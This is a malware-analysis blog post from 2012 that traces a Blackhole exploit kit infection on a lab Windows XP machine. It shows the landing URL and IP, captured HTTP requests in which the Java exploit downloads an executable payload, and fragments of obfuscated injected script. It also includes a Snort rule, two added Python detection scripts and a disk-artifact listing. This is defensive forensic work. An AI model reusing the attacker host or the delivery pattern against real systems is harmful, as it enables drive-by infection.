Saturday, September 22, 2012

Blackhole Disk Artifacts - A Complete Dump

Recently, I've been concentrating my activities on disk artifacts post-infection. Today, I fired up my lab and infected a system while grabbing as much information as possible.

Infection Point: hxxp://46.249.59.116/main.php?page=5a56c997ffff2f79

Date: 09/22/2012

Platform: Windows XP Pro, SP3, unpatched, Java 6 Update 29, Windows Media Player 9, No Adobe Flash, No Adobe Reader, IE 8, Windows Firewall Disabled, No AV.

Retention: Once this completed I took a full snapshot of the entire disk, to share or analyze further later. If you would like it, just twitter me @fknsec. The snapshot is about 1GB uncompressed.

Methodology: A snapshot of the entire disk and registry was taken prior to infection and compared against post infection for delta. Wireshark and IE were the only active applications on the system. I used Wireshark, Installrite, VirtualBox, Windows XP and IE8. It should be noted that in the disk capture, Windows Media player did go through its initial startup.

The Infection

First and foremost, I entered the URL into Internet Explorer, where Java launched and I was presented with the standard "Please wait while page is loading" in the center of the screen. The first file served up to me was Gam.jar. Response is nginx chunked, nothing unusual here.

GET /main.php?page=5a56c997ffff2f79 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 46.249.59.116
Connection: Keep-Alive



HTTP/1.1 200 OK
Server: nginx
Date: Sat, 22 Sep 2012 16:32:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.15



1fb8

<html><body><applet archive="Gam.jar"/code="plugindetecta.plugindetecta"><param name="uid" value=N0b0909041f31312b343c272b3e3c423e3c373734310a3c040b043d2c393e2900373e0235391c /></applet><script>md="a";r="replace";rrr="getAttribute";rr="reverse";</script><b id="b"
Searching on the opening offset:0 of the response, I come up with 313 hits in Google, mostly from jsunpack, including some variations like this (with a missing "/" after Gam.jar):
<html><body><applet archive="Gam.jar" code="importantThinga.importantThinga">
http://jsunpack.jeek.org/dec/go?report=cecd770436c23a953511f66befcc12da8cbeb7cb

Additionally, some of the entries noted come back with the <script>abre variant, which is all too common with SQL-injected WordPress pages.
<script>try{awebw++;}catch(awtbawt){try{nta23t|15232}catch(tabsd){m=Math;ev=window[""+"e"+"val"];
http://jsunpack.jeek.org/dec/go?report=71f9a841aeebe2944633c46950f9848a4a8c8bb6

I am currently aware of approximately 1,600+ WordPress sites which are currently infected with this script. Some of these triggered AVG's online shield.


Next, Windows Media Player was launched with the file name hcp_asx. I found it interesting that this version of Blackhole hit Windows Media Player for exploit before any other available exploits on the system. Not going to get into this because some analysis already exists here and those of you using Snort are likely familiar with this rule:

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP ovflow Media Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f="; http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity; sid:2013077; rev:1;)


So the system was compromised by Blackhole and a bunch of stuff happened. Let's look at what happens on the disk. The binary was delivered as an HTTP attachment.


GET /w.php?f=97d19&e=0 HTTP/1.1
User-Agent: Java/1.6.0_29
Host: 46.249.59.116
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 22 Sep 2012 16:32:21 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.15
Pragma: public
Expires: Sat, 22 Sep 2012 16:32:21 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary
Content-Length: 288615


MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

No callouts were observed.
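
The payload request above pairs a Java user agent with a Windows executable in the response, which is a useful detection key on a proxy or in a capture. The following is an added example, not part of the original post: the function name `java_pe_download` and the benign comparison traffic are assumptions made for illustration, and the response head is abridged from the capture shown above.

```python
import re

# Message heads copied (response abridged) from the capture in the post.
REQUEST_HEAD = """GET /w.php?f=97d19&e=0 HTTP/1.1
User-Agent: Java/1.6.0_29
Host: 46.249.59.116
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
"""
RESPONSE_HEAD = """HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-msdownload
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Length: 288615
"""
# Constructed stand-in for the payload: only the leading "MZ" is taken from the post.
BODY_PREFIX = b"MZ" + bytes(62)

# Constructed benign traffic for comparison: the JVM fetching an archive,
# and a browser (not Java) downloading an installer.
BENIGN_JAR_HEAD = """HTTP/1.1 200 OK
Content-Type: application/java-archive
Content-Length: 34816
"""
BROWSER_REQUEST_HEAD = """GET /setup.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: downloads.example
"""

PE_CONTENT_TYPES = {
    "application/x-msdownload",
    "application/x-msdos-program",
    "application/x-dosexec",
}
PE_EXTENSIONS = (".exe", ".dll", ".scr")


def parse_head(text):
    """Return (start_line, headers) where headers maps lower-cased names to value lists."""
    lines = text.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # end of the header block
        name, _, value = line.partition(":")
        # Repeated headers (Cache-Control appears twice above) are kept as a list.
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0].strip(), headers


def java_pe_download(request_head, response_head, body_prefix=b""):
    """List the reasons a Java-initiated transaction looks like a PE download."""
    _, req = parse_head(request_head)
    _, resp = parse_head(response_head)
    agent = " ".join(req.get("user-agent", []))
    if not agent.startswith("Java/"):
        return []  # this check only covers requests made by the JVM itself

    reasons = []
    ctype = resp.get("content-type", [""])[0].split(";")[0].strip().lower()
    if ctype in PE_CONTENT_TYPES:
        reasons.append("content-type " + ctype)

    disposition = " ".join(resp.get("content-disposition", []))
    match = re.search(r'filename="?([^";]+)', disposition, re.I)
    if match and match.group(1).lower().endswith(PE_EXTENSIONS):
        reasons.append("attachment filename " + match.group(1))

    # The header can lie; the first two bytes of a PE file cannot.
    if body_prefix[:2] == b"MZ":
        reasons.append("body starts with MZ")
    return reasons


if __name__ == "__main__":
    print(java_pe_download(REQUEST_HEAD, RESPONSE_HEAD, BODY_PREFIX))
    print(java_pe_download(REQUEST_HEAD, BENIGN_JAR_HEAD, b"PK\x03\x04"))
    print(java_pe_download(BROWSER_REQUEST_HEAD, RESPONSE_HEAD, BODY_PREFIX))
```

Any one of the three reasons is worth an alert on its own; the body check still fires when the server sends a misleading Content-Type.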

What Happened on The Disk

The creation of v.class by the root process java as well as the downloader wgsdgsdgdsgsd.exe in the user's temp folder is consistent with most of the activity I have been analyzing lately.

A full list is included here of all the files created, edited (size changes) and deleted from the system, as well as all registry entries.

I was well aware of hsperfdata_%username% as a disk artifact, not necessarily of infection, but as an indicator that Java had executed at a specific time/date stamp. There were a series of cache folders and files that were also created under:

documents and settings\%username%\Application Data\Sun\Java\Deployment\cache\6.0
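
A before/after delta is mostly noise from normal operation, so a triage pass that pulls out the Java and dropped-binary artifacts and orders them by time is a practical first step. The following is an added example, not part of the original post: the sample rows are copied from the delta listing in this post, while the rule labels and the functions `parse_row` and `triage` are assumptions made for illustration. The flattened listing does not say whether a single-valued row was created or deleted, so those rows are reported as present in one snapshot only.

```python
import re
from datetime import datetime

# Rows copied verbatim from the post's delta listing.
SAMPLE_DELTA = r"""
C:\Documents and Settings\bomber\Application Data\Feuw 1KB D
C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe 289KB A 9/22/2012 12:31:30 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42\32fd55ea-33417afb 34KB A 9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42\32fd55ea-33417afb.idx 1KB A 9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Cookies\index.dat 33KB 33KB HSA HSA 9/22/2012 12:25:05 PM 9/22/2012 12:34:01 PM
C:\WINDOWS\Prefetch\JAVAW.EXE-2DC32ABC.pf 50KB 107KB A A 9/22/2012 11:58:50 AM 9/22/2012 12:34:06 PM
C:\Documents and Settings\bomber\Local Settings\Temp\V.class 7KB A 9/22/2012 12:34:03 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wgsdgsdgdsgsd.exe 289KB A 9/22/2012 12:34:06 PM
C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864 66KB A 9/22/2012 12:31:18 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123113_a02096 1,026KB A 9/22/2012 12:32:07 PM
"""

# A row is: path, one or two sizes, one or two attribute strings, zero to two timestamps.
ROW = re.compile(
    r"^(?P<path>[A-Za-z]:\\.+?)\s+"
    r"(?P<sizes>[\d,]+KB(?:\s+[\d,]+KB)?)\s+"
    r"(?P<attrs>[A-Z]+(?:\s+[A-Z]+)?)"
    r"(?:\s+(?P<dates>\d.*))?$"
)
STAMP = re.compile(r"\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M")

# Hypothetical rule labels, one per artifact class called out in the post.
RULES = [
    # hsperfdata_<user>\<pid>: a JVM was running at this time.
    ("jvm-ran", re.compile(r"\\hsperfdata_[^\\]+\\\d+$", re.I)),
    # Cached applet content; the .idx companion records where it was fetched from.
    ("java-cache-entry", re.compile(
        r"\\Deployment\\(?:System)?cache\\[\d.]+\\\d+\\[0-9a-f]+-[0-9a-f]+(\.idx)?$", re.I)),
    # Executable content written where a standard user can write.
    ("exec-in-user-path", re.compile(
        r"\\(Application Data|Local Settings\\Temp)\\.*\.(exe|dll|scr|class|jar)$", re.I)),
    # Prefetch update for the Java launcher: execution evidence outside the profile.
    ("prefetch-java", re.compile(r"\\Prefetch\\JAVAW?\.EXE-[0-9A-F]+\.pf$", re.I)),
]


def parse_row(line):
    """Parse one listing row into a dict, or return None if it is not a row."""
    m = ROW.match(line.strip())
    if m is None:
        return None
    sizes = [int(s[:-2].replace(",", "")) for s in m["sizes"].split()]
    stamps = [datetime.strptime(s, "%m/%d/%Y %I:%M:%S %p")
              for s in STAMP.findall(m["dates"] or "")]
    if "D" in m["attrs"]:
        state = "directory"
    elif len(sizes) == 2:
        state = "changed"          # present before and after
    else:
        state = "one-snapshot"     # created or deleted; the listing does not say which
    return {"path": m["path"], "sizes_kb": sizes, "state": state,
            "when": stamps[-1] if stamps else None}  # last stamp = post-infection


def triage(listing):
    """Return (when, label, state, path) for every row that hits a rule, oldest first."""
    findings = []
    for line in listing.splitlines():
        row = parse_row(line) if line.strip() else None
        if row is None:
            continue
        for label, pattern in RULES:
            if pattern.search(row["path"]):
                findings.append((row["when"], label, row["state"], row["path"]))
    return sorted(findings, key=lambda f: f[0] or datetime.min)


if __name__ == "__main__":
    for when, label, state, path in triage(SAMPLE_DELTA):
        print(when, label, state, path.rsplit("\\", 1)[-1])
```

On the sample rows the ordering puts the hsperfdata entry and the Java cache entry just ahead of the first dropped executable, which is the sequence the post describes.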


Anywho... here is a dump of all the delta from the disk. Admittedly some of this is the result of normal operations, however, I believe there is some good information on disk artifacts including the hsperfdata and the Java cache information.



backhole1 - All Files

FileName Size Before Size After Attrib Before Attrib After Date Before Date After Version Before Version After CRC Before CRC After
C:\Documents and Settings\bomber\Application Data\Cesy 1KB D
C:\Documents and Settings\bomber\Application Data\Cesy\aqowe.ydb 2KB A 9/22/2012 12:34:00 PM
C:\Documents and Settings\bomber\Application Data\Feuw 1KB D
C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe 289KB A 9/22/2012 12:31:30 PM
C:\Documents and Settings\bomber\Application Data\Riafew 1KB D
C:\Documents and Settings\bomber\Application Data\Riafew\xiryq.quy 1KB A 9/22/2012 12:31:30 PM
C:\Documents and Settings\bomber\Application Data\Wireshark 1KB D
C:\Documents and Settings\bomber\Application Data\Wireshark\dfilters 1KB A 9/22/2012 12:32:39 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book 1KB D
C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab 177KB A 9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab~ 177KB A 9/22/2012 12:31:40 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Crypto\RSA\S-1-5-21-484763869-706699826-1060284298-1003\6b29ae44e85efac3c72ff4d1865d73f1_72b2dab9-a324-4085-acf9-f7c87e24dedd 1KB SA 9/22/2012 12:30:18 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk 1KB A 9/22/2012 12:33:46 PM
C:\Documents and Settings\bomber\Application Data\Microsoft\Media Player\0009236B.wpl 1KB A 9/22/2012 12:34:04 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\0 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\1 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\10 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\11 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\12 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\13 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\14 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\15 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\16 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\17 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\18 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\19 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\2 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\20 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\21 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\22 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\23 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\24 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\25 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\26 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\27 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\28 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\29 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\3 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\30 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\31 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\32 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\33 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\34 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\35 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\36 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\37 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\38 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\39 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\4 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\40 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\41 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42\32fd55ea-33417afb 34KB A 9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42\32fd55ea-33417afb.idx 1KB A 9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\43 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\44 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\45 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\46 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\47 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\48 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\49 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\5 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\50 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\51 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\52 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\53 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\54 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\55 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\56 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\57 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\58 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\59 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\6 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\60 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\61 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\62 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\63 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\7 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\8 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\9 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\host 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed 1KB A 9/22/2012 12:31:27 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\muffin 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\tmp 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\deployment.properties 1KB A 9/22/2012 12:31:23 PM
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\ext 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\log 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\0 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\1 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\10 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\11 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\12 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\13 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\14 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\15 1KB D
C:\Documents and Settings\bomber\Cookies\index.dat 33KB 33KB HSA HSA 9/22/2012 12:25:05 PM 9/22/2012 12:34:01 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Feeds Cache\index.dat 33KB 33KB HSA HSA 9/22/2012 12:16:43 PM 9/22/2012 12:28:34 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\index.dat 33KB 33KB HSA HSA 9/22/2012 12:16:43 PM 9/22/2012 12:29:35 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\A9JWFLPR\www.google[1].xml 1KB 1KB A A 9/22/2012 12:16:54 PM 9/22/2012 12:30:05 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG 2KB 2KB HA HA 9/22/2012 12:25:23 PM 9/22/2012 12:31:45 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML 13KB 13KB A A 9/22/2012 11:35:30 AM 9/22/2012 12:31:25 PM
C:\Documents and Settings\bomber\Local Settings\History\History.IE5\index.dat 66KB 66KB HSA HSA 9/22/2012 12:25:05 PM 9/22/2012 12:34:01 PM
C:\Documents and Settings\bomber\Local Settings\History\History.IE5\MSHist012012092220120923\index.dat 50KB 50KB HSA HSA 9/22/2012 12:16:43 PM 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temp\jusched.log 2KB 9KB A A 9/22/2012 12:25:07 PM 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\index.dat 443KB 476KB HSA HSA 9/22/2012 12:25:05 PM 9/22/2012 12:34:01 PM
C:\Documents and Settings\bomber\PrivacIE\index.dat 115KB 115KB HSA HSA 9/22/2012 12:16:43 PM 9/22/2012 12:28:34 PM
C:\Documents and Settings\bomber\Start Menu\Programs\Windows Media Player.lnk 1KB 1KB A A 9/22/2012 11:50:09 AM 9/22/2012 12:33:46 PM
C:\Documents and Settings\bomber\Start Menu\Programs\Accessories\Entertainment\Windows Media Player.lnk 1KB 1KB A A 9/22/2012 11:50:09 AM 9/22/2012 12:33:46 PM
C:\Documents and Settings\NetworkService\Cookies\index.dat 17KB 17KB HSA HSA 9/22/2012 11:48:42 AM 9/22/2012 12:24:04 PM
C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat 17KB 17KB HSA HSA 9/22/2012 11:48:42 AM 9/22/2012 12:24:04 PM
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat 33KB 33KB HSA HSA 9/22/2012 11:48:42 AM 9/22/2012 12:24:04 PM
C:\WINDOWS\wmsetup.log 1KB 2KB A A 9/22/2012 11:50:09 AM 9/22/2012 12:33:46 PM
C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf 14KB 15KB A A 9/22/2012 12:18:35 PM 9/22/2012 12:31:32 PM
C:\WINDOWS\Prefetch\CSRSS.EXE-12B63473.pf 25KB 25KB A A 9/22/2012 12:26:54 PM 9/22/2012 12:28:23 PM
C:\WINDOWS\Prefetch\IEXPLORE.EXE-27122324.pf 113KB 123KB A A 9/22/2012 12:16:49 PM 9/22/2012 12:28:43 PM
C:\WINDOWS\Prefetch\JAVAW.EXE-2DC32ABC.pf 50KB 107KB A A 9/22/2012 11:58:50 AM 9/22/2012 12:34:06 PM
C:\WINDOWS\Prefetch\NET.EXE-01A53C2F.pf 14KB 18KB A A 9/22/2012 12:18:30 PM 9/22/2012 12:33:30 PM
C:\WINDOWS\Prefetch\NET1.EXE-029B9DB4.pf 15KB 19KB A A 9/22/2012 12:18:30 PM 9/22/2012 12:33:30 PM
C:\WINDOWS\Prefetch\REGSVR32.EXE-25EEFE2F.pf 60KB 61KB A A 9/22/2012 11:50:16 AM 9/22/2012 12:34:07 PM
C:\WINDOWS\Prefetch\TASKMGR.EXE-20256C55.pf 19KB 21KB A A 9/22/2012 12:07:22 PM 9/22/2012 12:31:46 PM
C:\WINDOWS\Prefetch\UNREGMP2.EXE-07CACB61.pf 26KB 39KB A A 9/22/2012 11:50:09 AM 9/22/2012 12:33:46 PM
C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf 20KB 21KB A A 9/22/2012 12:26:26 PM 9/22/2012 12:33:46 PM
C:\WINDOWS\Prefetch\WINLOGON.EXE-32C57D49.pf 33KB 33KB A A 9/22/2012 12:26:54 PM 9/22/2012 12:28:24 PM
C:\WINDOWS\system32\CatRoot2\edb.chk 9KB 9KB A A 9/22/2012 12:26:41 PM 9/22/2012 12:28:41 PM
C:\WINDOWS\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb 3,154KB 3,154KB A A 9/22/2012 12:26:13 PM 9/22/2012 12:28:13 PM
C:\WINDOWS\system32\config\system.LOG 2KB 2KB HA HA 9/22/2012 12:26:22 PM 9/22/2012 12:33:33 PM
C:\WINDOWS\system32\wbem\Logs\wbemcore.log 38KB 38KB A A 9/22/2012 12:21:49 PM 9/22/2012 12:31:35 PM
C:\WINDOWS\system32\wbem\Logs\wbemess.log 3KB 4KB A A 9/22/2012 12:25:07 PM 9/22/2012 12:33:30 PM
C:\WINDOWS\system32\wbem\Logs\wbemprox.log 1KB 1KB A A 9/22/2012 11:49:59 AM 9/22/2012 12:31:35 PM
C:\WINDOWS\system32\wbem\Logs\wmiprov.log 1KB 1KB A A 9/22/2012 11:55:29 AM 9/22/2012 12:28:16 PM
C:\Documents and Settings\bomber\Cookies\GVNZ58AI.txt 1KB A 9/22/2012 12:06:45 PM
C:\Documents and Settings\bomber\Cookies\J695B3FR.txt 1KB A 9/22/2012 12:05:35 PM
C:\Documents and Settings\bomber\Cookies\JTYOEQBQ.txt 1KB A 9/22/2012 12:16:44 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{E4F1361D-04D0-11E2-A16B-08002765500A}.dat 5KB A 9/22/2012 12:23:34 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{E4F1361F-04D0-11E2-A16B-08002765500A}.dat 52KB A 9/22/2012 12:17:00 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\urlquery_net[1].htm 41KB A 9/22/2012 12:05:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\google_com[1].htm 108KB A 9/22/2012 12:16:53 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\qsonhs[2].aspx 1KB A 9/22/2012 12:16:45 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\redir_not_found[1].htm 6KB A 9/22/2012 12:05:35 PM
C:\System Volume Information 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\16 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\17 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\18 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\19 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\2 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\20 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\21 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\22 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\23 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\24 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\25 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\26 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\27 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\28 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\29 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\3 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\30 1KB D
C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\31 1KB D
